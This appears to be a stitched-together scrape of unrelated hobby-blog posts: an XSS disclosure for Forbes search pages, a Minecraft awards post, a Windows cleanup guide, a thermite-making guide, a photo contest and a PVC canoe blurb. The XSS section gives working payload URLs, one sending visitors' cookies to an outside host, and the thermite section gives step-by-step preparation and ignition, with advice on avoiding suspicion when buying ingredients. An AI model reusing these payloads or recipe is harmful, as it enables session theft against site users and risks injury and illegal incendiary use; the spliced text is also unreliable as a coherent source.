Repeat Until False

Here's another delicious Byte. Ucha Gobejishvili, a Georgian Security Researcher under the handle of longrifle0x, discovered two cross site scripting (XSS) vulnerabilities on the official website of Forbes. He discovered the hole in two different locations on the site, and has already informed the website of the vulnerability.

Cross-site scripting flaws occur when an attacker can send a malicious script to a different user exploiting improperly terminated JavaScript. XSS flaws allow an attacker to place malicious code that can execute attacks against other users in the security context of the website in question in order to steal cookies, credentials and other dangerous actions with the use of JavaScript.

Requirements

• An internet browser with a JavaScript console, or URL JavaScript injection support

XSS Holes

The first of the two holes is located within the search form of Forbes. You can reach it at the following URL:

http://search.forbes.com/search/storyTypeSearch?storyType=%3CIFRAME%20SRC=%22javascript:alert%28%27XSS%27%29;%22%3E%3C/IFRAME%3E

Using some obfuscation, it easily gets around Forbes' protection.

The second hole is located at yet another script within the search form on Forbes.

http://search.forbes.com/search/colArchiveSearch?author=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Again, using simple obfuscation, we see it slide right past their protection.

You could send a nasty URL to someone in a link on another website, and it would look pretty innocent.

<a href="http://search.forbes.com/search/colArchiveSearch?author=%22%3E%3Cscript%3Ealert%28document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie%29%3C/script%3E</script>

How Could This Hole Be Fixed?

Forbes should validate all their forms, headers, and cookies. They should also convert scripts and script tags to a non-executable form by disallowing the use of special characters, which is what we used for obduscation. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that whitelist accepted characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security, and makes it harder to bypass input validation routines.

Want more Null Byte?

• Post to the forums
• Chat on IRC
• Follow on Twitter
• Circle on Google+

Image via discovery

Welcome to Minecraft World! Check out our tutorials, post to the community corkboard, and come play on our free server! 

Friday is finally here, and that can only mean one thing... Weekly Staff Choice Awards! Although this was only the first week of the Choice Awards, we had so many worthy entries! The staff went around to all of the new builds and compiled a great list of the best for the week. 

If you didn't win this week, don't fret! We will be doing the Weekly Staff Choice Awards every single week. If you would like to know what prizes will be given out for the Staff Choice Awards, check out the latest Weekly Challenge post to see what perks you could win! The prizes given out for the the Weekly Staff Choice Awards will always be the same as the prizes for the Weekly Challenge.

For next week, if you would like to enter your build, please do so by posting a video, screenshots, and some information about your build to the community corkboard.

You can also message me (Maroselis) in-game if you would like to recommend someone else for that week! If I'm not in game at the time, just type "/mail send Maroselis [And your message here] " (without the quotes). Please try to include the coordinates of the build you're recommending to make it easier for me to find it! Hit f3 in game to see your current coordinates.

Grand Prize Winner: Rauwomos

Rauwomos created an amazing Japanese-inspired pagoda. The detail he included is spectacular, and the materials he chose took this outstanding build to the next level.

Click here to watch the video

Honorable Mentions: Hotsolo & 2009antz2009

• HotSolo and her gorgeous mansion:

• 2009antz2009 and his castle-themed house:

Prizes

• 1 Grand Prize winner - Contributor rank in game + MushroomJump!
• Honorable Mentions - Contributor rank in game!

*Contributor rank in game allows you to change your gamemode (survival/creative), put yourself in godmode (/god), set 20 homes, claim 50 (16x16) plots and wear hats with /hat!

*MushroomJump - When you go on a giant mushroom, it launcher you up in the air. What is it for? For fun, of course! You can make awesome jump maps, or simply just spend the day jumping on mushrooms!

Congratulations!

Congratulations to the winners, I can't wait to see what all of you have in store for the Admins next week!

Don't forget to hop on the server this Saturday, January 28th at 4pm CST where we will be holding the Weekly Workshop! For this week's Workshop we will be discussing Architectural Design and Aesthetics.

We use TeamSpeak3 for our tutorials; you can download it free here.

Our channel is: ts.wonderhowto.com. 

Follow us on Twitter @MinecraftHowTo!  

Today's article serves as a general guide to keeping Windows 7 and Vista clean. The goal is to clean up your messy computer and have it running at maximum performance in no time. The question at hand is—what is your computer's performance like? 

Not great? Do you think it could be as a result of not taking good care of your computer?  If so, then this article is for you! 

Step 1 Toolbars & Bloatware

The very first step is to remove unnecessary items from the computer, such as items that came pre-installed when you brought it. These can include (but not limited to) trial games and antivirus programs. The general rule is: Any program that comes as a trial or something you must pay to use—remove it!

Toolbars are everywhere. These can be sneaky little buggers. Most toolbars come from installation packs. Toolbars, when installed, can quite often be hard to remove from the system, so keep a careful eye on your installation packs. NEVER choose the recommended installation method. It is advised to always choose the advanced option, as this is where you'll find most toolbars hiding. 

CNET's Download.com, a reputable organisation, has many great downloads. But let's study this a bit more. Why do programs come packed with toolbars, and sometimes other software? The answer is pretty obvious—it's called advertising. Small companies will often go to large sites that receive lots of downloads and ask to advertise their products in the downloads. So in this case, Blekko would have gone to CNET and offered a sum of money to advertise. In return, Blekko gets more publicity and buys more customers. 

Notice how the following are checked by default in the above picture? This is because many people, including me a few years back, click next, next, next without reading. Is this you? Then stop. Because you could be greeted with toolbars that are difficult to remove, malware, or even open your home page the next morning to see Blekko's home page. So, slow down and read.  

Now, another interesting thing in the above photograph is that the marketers also thought about those who DO stop and read. So, in a last attempt to buy customers, they added "special offer" in capitals to ensure it stands out. Further, the "recommended" was in bold. Don't be so quick to believe that "recommended" necessarily means a great product, so think twice before clicking next. In my personal opinion, toolbars are pointless. They slow down the computer and the browser. They honestly cause more problems then they fix. 

Step 2 Installing Cleaning Software

The next step is to install CCleaner and CCEnhancer. CCleaner which is formally known as CrapCleaner is probably the best cleaning tool out there. CCEnhancer isn't associated with the CCleaner development team in any way or form, however this tool adds an additional 500 programs to CCleaner for it to clean. 

The most common question I get is: What should be checked? This is a highly configurable program, so there is no direct answer for this question. I have personally checked everything but "wipe free space", as that doesn't need to be done often (and this can take hours to complete when checked). I have also not bothered with "Windows Backup*", as I need my computer back-ups. 

Step 3 Using Alternative Programs

Let's take a look at what alternative programs are out there to replace all those resource hogs. 

• Microsoft Word: The best free alternative is Google Docs. 
  Competitors: OpenOffice, LibreOffice & Zoho Docs
• Adobe Reader: The best free alternative is Foxit Reader. 
  Competitors: Nitro PDF Reader & Sumatra PDF
• Internet Explorer: The best free alternative is Firefox (IMHO).
  Competitors: Opera, Google Chrome, Comodo Dragon, SeaMonkey & Waterfox. 
• Adobe Photoshop: The best free alternative is RawTherapee.
  Competitors: GIMP & Picasa
• Windows Live Messenger: The best free alternative is Skype.
  Competitors: Meebo, AIM, Yahoo! Messenger & Pidgin
• Windows Media Player: The best free alternative is VLC Media Player.
  Competitors: Media Player Classic & KMPlayer

Step 4 Some General Tweaks

Remember, a hard drive that is close to full (or is in the red zone, as shown in the picture at the top of this article) means you need to reduce clutter on your hard-drive or buy an external (or a second internal) hard-drive. I recommend an SSD over HDD. 

• Task #1: Change the default size of recycle bin. 

Reducing the size adds extra space to your computer, but it will also mean bigger files cannot fit into the recycle bin (should the files exceed that limit).

I recommend changing the maximum size for (C:) Drive to 2048MB. 

• Task #2: Disable Hibernate, as this can use a significant portion of space. 

To disable Hibernate, navigate to Windows -> search -> "CMD" and click "Run as Administrator".  In the command prompt type "powercfg -h off" -> enter and then you're done. To enable again, enter "powercfg -h on" in the Command Prompt. 

• Task #3: Vista and W7 Compression. (Note: this is not the same as a zip file—also note that you might notice a slowing in performance when you open a compressed folder). Do you download a lot? Maybe you're a photographer and have thousands of photographs on the computer. How can you compress them so they aren't using up so much space? It is as simple as right clicking a folder with contents in it or a file -> click advanced, and then "compress contents to save disk space".  To decompress the contents, just deselect it. 

I could explain so many more ways to free up space and speed the computer up, but honestly, that would be one very long post! To find out more ways do a Google Search, or check out some great articles on WonderHowTo. 

Resources

• Check out WinDirStat—it analyzes the computer and tells you what is taking up all your computer's space.  

Image via Clean My PC

I feel like doing a bit of chemistry today, how about you? To my knowledge, thermite is the hottest burning man-made substance. Thermite is a pyrotechnic composition of a metal powder and a metal oxide that produces an exothermic oxidation-reduction reaction known as a thermitereaction.

Fe2O3 + 2 Al ? 2 Fe + Al2O3

Basically, a high temperature burning metal like iron oxide (rust) mixed with an easier to ignite, oxidizing metal will produce incredibly high amounts of heat in a small area for a short amount of time. Thermite is so hot and powerful, that it can even burn straight through asphalt. This is fun for some homemade fireworks, but beware, it's against the law to make incendiary mixtures like this and ignite them.

Requirements

• A 9v battery -OR- iron oxide powder bought at a paint supply store
• Some wire
• NaCl (table salt)
• Aluminum foil or powder
• A jar
• A metal file
• Magnesium strips to ignite the thermite. You can also use sparklers, as most of them contain magnesium

Step 1 Collect Some Rust

To collect some rust, we can either go to the paint supply store to get it ourselves, or make it at home. Buying it is far easier and more convenient. Paint stores often sell iron oxide power as a color additive for paint. But if that isn't an option, here's how to make it:

1. Fill a jar with water.
2. Add a tablespoon of salt to the water.
3. Wrap separate wires around the positive and negative ends of the 9v battery.
4. Stick both wires in the water and see which one makes more bubbles.
5. Take the wire that makes more bubbles and wrap the exposed part to something metal, perferably iron, like a nail, and sink it in the water while removing the other wire.
6. Wait a few days for rust to build up, and scrape it off into a bowl with a metal file. Repeat to your heart's desire.

Step 2 Aluminum

Using aluminum in thermite is great because it has a low ignition point, but burns at a high temperature. This allows for very hot thermite. To get aluminum, you can also buy this from a paint or hardware store, but you might not want to buy them at the same time, in fear of the employees suspecting what you are up to.

You can actually grind or cut up plain old aluminum foil if you can't get any power. Try to get the chunks as small as you can.

Step 3 Mix it Up & Burn

You should have a visual 50-50 mixure of rust and aluminum. Meaning they look like the same amount, but do not weigh the same.

Using a very long strand of magnesium ribbon, put it in a pile of thermite, ignite it, and run away. You can use a sparkler, too. 

Warnings

• Be very careful! You could kill yourself if the thermite ignites with you too close.

Want more Null Byte?

• Post to the forums
• Chat on IRC
• Follow on Twitter
• Circle on Google+

Image via nicefun

Our very last Phone Snap! challenge is all about having a little fun, so start practicing your goofiest faces. Submit a phone snapped image of your interpretation of a "funny face" to the community corkboard by Monday, January 30th, 11:59pm PST for a chance to win an (appropriately silly) 1/2 pound gummy bear on a stick!

To inspire your entry, 20 funny faces captured by various Flickr users—taken with cell phones only, of course!

• Fivehead by davitydave (Instagram)

• Teef by ninasaurusrex (Instagram)

• Burger Face by Rantz (Hipstamatic)

• Untitled by NicoleAbalde (Instagram)

• Tongue Cat by sniggitysnags (Instagram)

• Funny Face Tree by jambled (Polarize)

• Face Shot by numbphoto (Hipstamatic)

• Rodízio Feliz by Jeff Belmonte (Instagram) 

• Untitled by stefernie (Diptic)

• We dyed the Boy's Tongue to Match His Eyes by timlav (Instagram)

• Day 211 by squeezeomatic (Hipstamatic)

• The Tongue Thing Is Becoming a Habit by penreyes (Instagram)

• Untitled by Melissa Segal (Hipstamatic)

• Her Face Looks Like a Symbol "*" by KlaireLee (Instragram)

• Pug Smile + Tongue by shortformelissa (Instagram)

• Berlin by dtailed (ShakeIt)

• Tongue Spill by neverminding (Instagram)

• Silly Faces by vinsflickr (Instagram)

• Monster Face with Funny Glasses by cpennywcupa (Instagram)

• Hammer365: 043/322 Fun with Me's by David Reber's Hammer Photography

What would MacGyver do if he was stranded on a trash dump in the middle of the ocean? If he had the right supplies, chances are he'd come up with something very similar to this PVC and duct tape boat. C'mon, we all know MacGyver always has duct tape on him!

A while back, Ben Glick and his son Daniel ventured into the land of MacGyverisms when building a prototype for their more expensive wood-framed and fabric-skinned kayak. The prototype canoe is made from PVC pipe, plastic sheeting, cord, and two empty one-gallon milk jugs with lids. And let's not forget MacGyver's favorite thing—duct tape.

If you've even got the slightest bit of aquaphobia in you, I wouldn't suggest trying this makeshift watercraft out. But if you're more than comfortable on the open water in a boat made of plastic, then continue on to the instructions on how to build your own at Duckworks.

This homemade canoe shouldn't set you back more than 30 bucks and 5 hours.